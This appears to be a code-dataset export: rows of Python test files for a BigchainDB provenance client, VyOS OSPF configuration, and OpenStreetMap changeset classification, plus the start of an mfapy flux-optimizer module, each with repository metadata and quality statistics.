hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ce28fb507443089ac0720812f011e25007170b8a
| 13,885
|
py
|
Python
|
prov2bigchaindb/tests/core/test_clients.py
|
DLR-SC/prov2bigchaindb
|
a21c78a80e502409281aa25999756f2b695d8301
|
[
"Apache-2.0"
] | 6
|
2017-04-06T07:34:20.000Z
|
2020-12-31T07:56:29.000Z
|
prov2bigchaindb/tests/core/test_clients.py
|
DLR-SC/prov2bigchaindb
|
a21c78a80e502409281aa25999756f2b695d8301
|
[
"Apache-2.0"
] | 25
|
2017-04-07T12:45:11.000Z
|
2018-11-08T11:21:04.000Z
|
prov2bigchaindb/tests/core/test_clients.py
|
DLR-SC/prov2bigchaindb
|
a21c78a80e502409281aa25999756f2b695d8301
|
[
"Apache-2.0"
] | null | null | null |
import logging
import unittest
from time import sleep
from unittest import mock
from bigchaindb_driver import pool as bdpool
from prov2bigchaindb.core import utils, clients
from prov2bigchaindb.tests.core import setup_test_files
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class BaseClientTest(unittest.TestCase):
"""Test BigchainDB Base Client"""
def setUp(self):
self.account_id = 'Base_Client_Test'
self.public_key = 'public'
self.private_key = 'private'
self.host = '127.0.0.1'
self.port = 9984
def tearDown(self):
del self.account_id
del self.public_key
del self.private_key
del self.host
del self.port
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
def test_positive_init(self, mock_bdb, mock_store):
baseclient = clients.BaseClient(self.host, self.port)
baseclient.connection = mock_bdb
baseclient.accountstore = mock_store
self.assertIsInstance(baseclient, clients.BaseClient)
# self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
self.assertIsInstance(baseclient.node, str)
self.assertEqual(baseclient.node, 'http://127.0.0.1:9984')
# TODO Check Instance of account_db
@unittest.skip("testing skipping")
def test_test_transaction(self):
raise NotImplementedError()
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
def test_save_document(self, mock_bdb, mock_store):
baseclient = clients.BaseClient(self.host, self.port)
baseclient.connection = mock_bdb
baseclient.accountstore = mock_store
with self.assertRaises(NotImplementedError):
baseclient.save_document('foo')
class DocumentConceptClientTest(unittest.TestCase):
"""Test BigchainDB Base Client"""
def setUp(self):
self.account_id = 'Document_Client_Test'
self.public_key = 'public'
self.private_key = 'private'
self.host = '127.0.0.1'
self.port = 9984
self.test_prov_files = setup_test_files()
self.prov_document = utils.to_prov_document(content=self.test_prov_files["simple"])
def tearDown(self):
del self.account_id
del self.public_key
del self.private_key
del self.host
del self.port
del self.test_prov_files
del self.prov_document
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.DocumentConceptAccount')
def test_positive_init(self, mock_account, mock_dbd, mock_store):
doc_client = clients.DocumentConceptClient(self.account_id, self.host, self.port)
self.assertIsInstance(doc_client, clients.DocumentConceptClient)
# self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
# self.assertIsInstance(baseclient.account, accounts.DocumentModelAccount)
self.assertIsInstance(doc_client.node, str)
self.assertEqual(doc_client.node, 'http://127.0.0.1:9984')
# TODO Check Instance of account_db
# TODO Check Instance of account
@mock.patch('prov2bigchaindb.core.clients.utils.is_valid_tx')
@mock.patch('prov2bigchaindb.core.clients.utils.is_block_to_tx_valid')
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.DocumentConceptAccount')
def test_get_document(self, mock_account, mock_bdb, mock_store, mock_test_block, mock_test_tx):
mock_bdb.transactions.retrieve.return_value = {'id': '1', 'asset': {
'data': {'prov': self.prov_document.serialize(format='json')}}}
mock_test_block.return_value = True
mock_test_tx.return_value = True
doc_client = clients.DocumentConceptClient(self.account_id, self.host, self.port)
doc_client.account = mock_account
doc_client.connection_pool = bdpool.Pool([mock_bdb])
# Test
document = doc_client.get_document('1')
sleep(1)
doc_client._get_bigchain_connection().transactions.retrieve.assert_called_with('1')
self.assertEqual(document, self.prov_document)
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.DocumentConceptAccount')
def test_save_document(self, mock_account, mock_bdb, mock_store):
mock_account.save_asset.return_value = '1'
doc_client = clients.DocumentConceptClient(self.account_id, self.host, self.port)
doc_client.account = mock_account
doc_client.connection_pool = bdpool.Pool([mock_bdb])
tx_id = doc_client.save_document(self.prov_document)
doc_client.account.save_asset.assert_called_with({'prov': self.prov_document.serialize(format='json')},
mock_bdb)
self.assertIsInstance(tx_id, str)
self.assertEqual(tx_id, '1')
class GraphConceptClientTest(unittest.TestCase):
"""Test BigchainDB Base Client"""
def setUp(self):
self.account_id = 'Graph_Client_Test'
self.public_key = 'public'
self.private_key = 'private'
self.host = '127.0.0.1'
self.port = 9984
self.test_prov_files = setup_test_files()
self.prov_document = utils.to_prov_document(content=self.test_prov_files["simple"])
def tearDown(self):
del self.account_id
del self.public_key
del self.private_key
del self.host
del self.port
del self.test_prov_files
del self.prov_document
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
def test_positive_init(self, mock_account, mock_dbd, mock_store):
graph_client = clients.GraphConceptClient(self.host, self.port)
self.assertIsInstance(graph_client, clients.GraphConceptClient)
# self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
# self.assertIsInstance(baseclient.account, accounts.DocumentModelAccount)
self.assertIsInstance(graph_client.node, str)
self.assertEqual(graph_client.node, 'http://127.0.0.1:9984')
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
def test__get_prov_element_list(self, mock_account, mock_bdb):
graph_client = clients.GraphConceptClient(self.host, self.port)
prov_document = utils.to_prov_document(content=self.test_prov_files["simple2"])
prov_records = prov_document.get_records()
prov_namespaces = prov_document.get_registered_namespaces()
element_list = clients.GraphConceptClient.calculate_account_data(prov_document)
for element, relations, namespace in element_list:
# print(element)
# print("\twith: ",relations['with_id'])
# print("\twithout: ",relations['without_id'])
pass
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.utils.is_valid_tx')
@mock.patch('prov2bigchaindb.core.clients.utils.is_block_to_tx_valid')
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
def test_get_document(self, mock_account, mock_bdb, mock_store, mock_test_block, mock_test_tx):
mock_bdb.transactions.retrieve.return_value = {'id': '1', 'asset': {
'data': {'prov': self.prov_document.serialize(format='json')}}}
mock_test_block.return_value = True
mock_test_tx.return_value = True
graph_client = clients.GraphConceptClient(self.host, self.port)
graph_client.account = mock_account
graph_client.connection = mock_bdb
# Test
document = graph_client.get_document(['1'])
sleep(1)
graph_client.connection.transactions.retrieve.assert_called_with('1')
self.assertEqual(document, self.prov_document)
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.GraphConceptAccount')
def test_save_document(self, mock_account, mock_bdb, mock_store):
mock_account.save_asset.return_value = '1'
graph_client = clients.GraphConceptClient(self.host, self.port)
graph_client.account = mock_account
graph_client.connection = mock_bdb
tx_id = graph_client.save_document(self.prov_document)
graph_client.account.save_asset.assert_called_with({'prov': self.prov_document.serialize(format='json')},
mock_bdb)
self.assertIsInstance(tx_id, str)
self.assertEqual(tx_id, '1')
class RoleConceptClientTest(unittest.TestCase):
"""Test BigchainDB Base Client"""
def setUp(self):
self.account_id = 'Role_Client_Test'
self.public_key = 'public'
self.private_key = 'private'
self.host = '127.0.0.1'
self.port = 9984
self.test_prov_files = setup_test_files()
self.prov_document = utils.to_prov_document(content=self.test_prov_files["simple"])
def tearDown(self):
del self.account_id
del self.public_key
del self.private_key
del self.host
del self.port
del self.test_prov_files
del self.prov_document
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
def test_positive_init(self, mock_account, mock_bdb, mock_store):
role_client = clients.RoleConceptClient(self.host, self.port)
self.assertIsInstance(role_client, clients.RoleConceptClient)
# self.assertIsInstance(baseclient.accountstore, utils.LocalAccountStore)
# self.assertIsInstance(baseclient.account, accounts.DocumentModelAccount)
self.assertIsInstance(role_client.node, str)
self.assertEqual(role_client.node, 'http://127.0.0.1:9984')
# TODO Check Instance of account_db
# TODO Check Instance of account
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
def test__get_prov_element_list(self, mock_account, moch_bdb):
role_clien = clients.RoleConceptClient(self.host, self.port)
prov_document = utils.to_prov_document(content=self.test_prov_files["simple2"])
prov_records = prov_document.get_records()
prov_namespaces = prov_document.get_registered_namespaces()
element_list = clients.RoleConceptClient.calculate_account_data(prov_document)
for element, relations, namespace in element_list:
# print(element)
# print("\twith: ",relations['with_id'])
# print("\twithout: ",relations['without_id'])
pass
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.utils.is_valid_tx')
@mock.patch('prov2bigchaindb.core.clients.utils.is_block_to_tx_valid')
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
def test_get_document(self, mock_account, mock_bdb, mock_store, mock_test_block, mock_test_tx):
mock_bdb.transactions.retrieve.return_value = {'id': '1', 'asset': {
'data': {'prov': self.prov_document.serialize(format='json')}}}
mock_test_block.return_value = True
mock_test_tx.return_value = True
role_client = clients.RoleConceptClient(self.host, self.port)
role_client.account = mock_account
role_client.connection = mock_bdb
# Test
document = role_client.get_document(['1'])
sleep(1)
role_client.connection.transactions.retrieve.assert_called_with('1')
self.assertEqual(document, self.prov_document)
@unittest.skip("testing skipping")
@mock.patch('prov2bigchaindb.core.clients.local_stores.SqliteStore')
@mock.patch('prov2bigchaindb.core.clients.clients.bd.BigchainDB')
@mock.patch('prov2bigchaindb.core.clients.accounts.RoleConceptAccount')
def test_save_document(self, mock_account, mock_bdb, mock_store):
mock_account.save_asset.return_value = '1'
role_client = clients.RoleConceptClient(self.host, self.port)
role_client.account = mock_account
role_client.connection = mock_bdb
tx_id = role_client.save_document(self.prov_document)
role_client.account.save_asset.assert_called_with({'prov': self.prov_document.serialize(format='json')},
mock_bdb)
self.assertIsInstance(tx_id, str)
self.assertEqual(tx_id, '1')
| 46.750842
| 113
| 0.707022
| 1,631
| 13,885
| 5.789086
| 0.082771
| 0.084516
| 0.104215
| 0.121584
| 0.921521
| 0.900551
| 0.867295
| 0.866024
| 0.845584
| 0.829273
| 0
| 0.012653
| 0.186028
| 13,885
| 296
| 114
| 46.908784
| 0.822775
| 0.071732
| 0
| 0.774468
| 0
| 0
| 0.206258
| 0.166096
| 0
| 0
| 0
| 0.003378
| 0.119149
| 1
| 0.093617
| false
| 0.008511
| 0.029787
| 0
| 0.140426
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbff75631c8f62c5edd0b74b41ffb0e122fef308
| 2,951
|
py
|
Python
|
tests/test_ospf.py
|
inmanta/vyos
|
298a4232f3b8c841351fe399b200b6aa55b494f2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_ospf.py
|
inmanta/vyos
|
298a4232f3b8c841351fe399b200b6aa55b494f2
|
[
"Apache-2.0"
] | 35
|
2020-03-25T14:44:52.000Z
|
2022-02-14T12:11:09.000Z
|
tests/test_ospf.py
|
inmanta/vyos
|
298a4232f3b8c841351fe399b200b6aa55b494f2
|
[
"Apache-2.0"
] | null | null | null |
import vymgmt
def convert_bool(val):
return "true" if val else "false"
def test_ospf(project, vy_host, console: vymgmt.Router):
def make_config(purge=False):
project.compile(
f"""
import vyos
r1 = vyos::Host(
name="lab1",
user="vyos",
password="vyos",
ip="{vy_host}")
ospf1 = vyos::Ospf(
area=0,
network=["10.15.1.0/24"],
router_id="10.1.1.1",
host=r1,
purged={convert_bool(purge)}
)
"""
)
console.configure()
console.run_conf_mode_command("load /config/clear.config")
out = console.run_conf_mode_command("commit")
print(out)
console.exit(force=True)
make_config()
compare = project.dryrun_resource("vyos::Config")
assert "purged" in compare
assert len(compare) == 1
project.deploy_resource("vyos::Config")
compare = project.dryrun_resource("vyos::Config")
assert len(compare) == 0
make_config(True)
compare = project.dryrun_resource("vyos::Config")
assert "purged" in compare
assert len(compare) == 1
project.deploy_resource("vyos::Config")
compare = project.dryrun_resource("vyos::Config")
assert len(compare) == 0
def test_ospf_redistribute(project, vy_host, console: vymgmt.Router):
def make_config(purge=False, redistributes="connected"):
project.compile(
f"""
import vyos
r1 = vyos::Host(
name="lab1",
user="vyos",
password="vyos",
ip="{vy_host}")
ospf1 = vyos::Ospf(
area=0,
network=["10.15.1.0/24"],
router_id="10.1.1.1",
host=r1,
purged={convert_bool(purge)},
)
vyos::OspfRedistribute(
type="{redistributes}",
ospf=ospf1
)
"""
)
console.configure()
console.run_conf_mode_command("load /config/clear.config")
out = console.run_conf_mode_command("commit")
print(out)
console.exit(force=True)
make_config()
compare = project.dryrun_resource("vyos::Config")
assert "purged" in compare
assert len(compare) == 1
project.deploy_resource("vyos::Config")
compare = project.dryrun_resource("vyos::Config")
assert len(compare) == 0
make_config(redistributes="static")
compare = project.dryrun_resource("vyos::Config")
assert len(compare) == 2
assert "protocols ospf redistribute connected metric-type" in compare
assert "protocols ospf redistribute static metric-type" in compare
project.deploy_resource("vyos::Config")
compare = project.dryrun_resource("vyos::Config")
assert len(compare) == 0
make_config(True)
compare = project.dryrun_resource("vyos::Config")
assert "purged" in compare
assert len(compare) == 1
project.deploy_resource("vyos::Config")
compare = project.dryrun_resource("vyos::Config")
assert len(compare) == 0
| 23.608
| 73
| 0.620129
| 350
| 2,951
| 5.097143
| 0.194286
| 0.100897
| 0.151345
| 0.156951
| 0.837444
| 0.837444
| 0.837444
| 0.837444
| 0.837444
| 0.807175
| 0
| 0.021105
| 0.245341
| 2,951
| 124
| 74
| 23.798387
| 0.779973
| 0
| 0
| 0.769231
| 0
| 0
| 0.372416
| 0.066079
| 0
| 0
| 0
| 0
| 0.175824
| 1
| 0.054945
| false
| 0.021978
| 0.032967
| 0.010989
| 0.098901
| 0.021978
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02472e7c257263c2b3f45c63efe5cdc86ca03cbe
| 4,647
|
py
|
Python
|
tests/test_mod.py
|
LaudateCorpus1/gabbar
|
92014028b3a283467f45554087539876d5ee94eb
|
[
"MIT"
] | 19
|
2017-02-08T16:55:07.000Z
|
2019-10-09T03:55:54.000Z
|
tests/test_mod.py
|
mapbox/gabbar
|
2911f6610cdfedfd9736fe7f3b55a34e039a8d7e
|
[
"MIT"
] | 63
|
2017-02-06T11:23:23.000Z
|
2017-07-16T16:23:13.000Z
|
tests/test_mod.py
|
LaudateCorpus1/gabbar
|
92014028b3a283467f45554087539876d5ee94eb
|
[
"MIT"
] | 9
|
2017-02-11T19:19:48.000Z
|
2021-10-20T07:59:58.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import os
import gabbar
# Number of decimals of accuracy for testing equality.
NUMBER_OF_DECIMALS = 3
def test_get_features():
changeset_id = u'47734592'
# TODO: This is too non-verbose. Not scalable!!!
expected = {"changeset_id": "47734592", "features_created": 1, "features_modified": 0, "features_deleted": 0, "user_id": 5662807, "user_name": "Bhuvan Anand", "user_first_edit": "1492071806", "user_changesets": 1, "user_features": 1, "bbox_area": 0, "changeset_editor": "iD", "node_count": 1, "way_count": 0, "relation_count": 0, "property_modifications": 0, "geometry_modifications": 0, "feature_version_new": 1, "feature_version_low": 0, "feature_version_medium": 0, "feature_version_high": 0, "changeset_editor_iD": 1, "changeset_editor_JOSM": 0, "changeset_editor_MAPS.ME": 0, "changeset_editor_Potlatch": 0, "changeset_editor_Redaction bot": 0, "changeset_editor_Vespucci": 0, "changeset_editor_OsmAnd": 0, "changeset_editor_Merkaartor": 0, "changeset_editor_gnome": 0, "changeset_editor_other": 0, "aerialway": 0, "aeroway": 0, "amenity": 1, "barrier": 0, "boundary": 0, "building": 0, "craft": 0, "emergency": 0, "geological": 0, "highway": 0, "historic": 0, "landuse": 0, "leisure": 0, "man_made": 0, "military": 0, "natural": 0, "office": 0, "place": 0, "power": 0, "public_transport": 0, "railway": 0, "route": 0, "shop": 0, "sport": 0, "tourism": 0, "waterway": 0}
actual = gabbar.get_features(changeset_id)
assert json.dumps(actual, sort_keys=True) == json.dumps(expected, sort_keys=True)
def test_filter_features():
features = {"changeset_id": "47734592", "features_created": 1, "features_modified": 0, "features_deleted": 0, "user_id": 5662807, "user_name": "Bhuvan Anand", "user_first_edit": "1492071806", "user_changesets": 1, "user_features": 1, "bbox_area": 0, "changeset_editor": "iD", "node_count": 1, "way_count": 0, "relation_count": 0, "property_modifications": 0, "geometry_modifications": 0, "feature_version_new": 1, "feature_version_low": 0, "feature_version_medium": 0, "feature_version_high": 0, "changeset_editor_iD": 1, "changeset_editor_JOSM": 0, "changeset_editor_MAPS.ME": 0, "changeset_editor_Potlatch": 0, "changeset_editor_Redaction bot": 0, "changeset_editor_Vespucci": 0, "changeset_editor_OsmAnd": 0, "changeset_editor_Merkaartor": 0, "changeset_editor_gnome": 0, "changeset_editor_other": 0, "aerialway": 0, "aeroway": 0, "amenity": 1, "barrier": 0, "boundary": 0, "building": 0, "craft": 0, "emergency": 0, "geological": 0, "highway": 0, "historic": 0, "landuse": 0, "leisure": 0, "man_made": 0, "military": 0, "natural": 0, "office": 0, "place": 0, "power": 0, "public_transport": 0, "railway": 0, "route": 0, "shop": 0, "sport": 0, "tourism": 0, "waterway": 0}
expected = [1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
actual = gabbar.filter_features(features)
print(json.dumps(actual))
for i, item in enumerate(expected):
assert actual[i] == expected[i]
for i, item in enumerate(actual):
assert actual[i] == expected[i]
def test_normalize_features():
features = [1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
expected = [1.0, 0.0, 0.0, 1.0, -0.031759025332264254, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.16666666666666666, 0.0, -0.14285714285714285, -0.14285714285714285, 0.0, -0.2, 0.0, 0.3333333333333333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.15, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1257359125315391, -0.037411378145639385, 0.0, -0.2]
actual = gabbar.normalize_features(features)
for i, item in enumerate(expected):
assert round(actual[i], NUMBER_OF_DECIMALS) == round(expected[i], NUMBER_OF_DECIMALS)
for i, item in enumerate(actual):
assert round(actual[i], NUMBER_OF_DECIMALS) == round(expected[i], NUMBER_OF_DECIMALS)
def test_get_prediction():
normalized_features = [1.0, 0.0, 0.0, 1.0, -0.031759025332264254, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.16666666666666666, 0.0, -0.14285714285714285, -0.14285714285714285, 0.0, -0.2, 0.0, 0.3333333333333333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.15, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1257359125315391, -0.037411378145639385, 0.0, -0.2]
expected = 1
actual = gabbar.get_prediction(normalized_features)
assert actual == expected
| 92.94
| 1,179
| 0.65354
| 793
| 4,647
| 3.675914
| 0.161412
| 0.152316
| 0.193482
| 0.219554
| 0.810978
| 0.794511
| 0.794511
| 0.754717
| 0.754717
| 0.754717
| 0
| 0.175151
| 0.146116
| 4,647
| 49
| 1,180
| 94.836735
| 0.559476
| 0.029697
| 0
| 0.258065
| 0
| 0
| 0.340067
| 0.12475
| 0
| 0
| 0
| 0.020408
| 0.193548
| 1
| 0.129032
| false
| 0
| 0.096774
| 0
| 0.225806
| 0.032258
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
65fc23079caf89fef95e45b741aa768e5c9f0ba6
| 33,160
|
py
|
Python
|
mfapy/optimize.py
|
kskmaeda/mfapy
|
f7d621fe412f0f04219189db5d1bb956cdee4e9c
|
[
"MIT"
] | 9
|
2019-02-24T07:48:03.000Z
|
2021-12-28T01:11:36.000Z
|
mfapy/optimize.py
|
fumiomatsuda/mfapy
|
0d22cfe3f7fe690565d039b7bda4fb80e2bb0eb7
|
[
"MIT"
] | 2
|
2020-09-05T15:48:11.000Z
|
2022-03-19T05:21:22.000Z
|
mfapy/optimize.py
|
kskmaeda/mfapy
|
f7d621fe412f0f04219189db5d1bb956cdee4e9c
|
[
"MIT"
] | 5
|
2020-04-11T12:49:29.000Z
|
2021-09-15T14:03:10.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: optimize.py
# Purpose: low level optimizer functions used in mfapy. These functions were separated from model instance for the parallel execution.
#
# Author: Fumio_Matsuda
#
# Created: 12/06/2018
# Copyright: (c) Fumio_Matsuda 2018
# Licence: MIT license
#-------------------------------------------------------------------------------
"""optimize.py:low level optimizer functions used in mfapy.
These functions were separated from model instance for the parallel execution.
Todo:
* Cleaning-up and support other optimizers
"""
import numpy as numpy
import scipy as scipy
import nlopt as nlopt
#from numba import jit
def initializing_Rm_fitting(numbers, vectors, matrixinv, template, initial_search_iteration_max, method = "fitting"):
"""Funcition to generate randomized initial flux dixtribution using scipy.optimize.minimize SLSQP
Args:
numbers (dict): "model.numbers" including various number related data of the model.
vectors (dict): "model.vector" including various vector related data of the model.
matrixinv (numpy 2d array): "model.matrixinv" is a inversed matrix of stoichiometry matrix for flux calculation.
template (dict): Dictionary of metabolic state. When template is available, metabolic state most similar to the template is generated. The function is used in the grid search.
initial_search_iteration_max (int): "configure["initial_search_iteration_max"]". Maximal number of interations (steps) allowed in each task to find feasible initial metabolic flux distribution.
method (str): "fitting" is only available.
Returns:
tmp_r (list) list of metabolic state data (tmp_r = numpy.dot(matrixinv, Rm_temp)
Rm_temp (list) metabolic state vector
Rm_ind (list) independent flux vector
state (str) State of finishing condition "Failed"/"Determined"
Examples:
>>> tmp_r, Rm_temp, Rm_ind, state = optimize.initializing_Rm_fitting(numbers, vectors, matrixinv, template ,initial_search_iteration_max)
See Also:
calc_protrude_scipy
"""
# number of independent flux
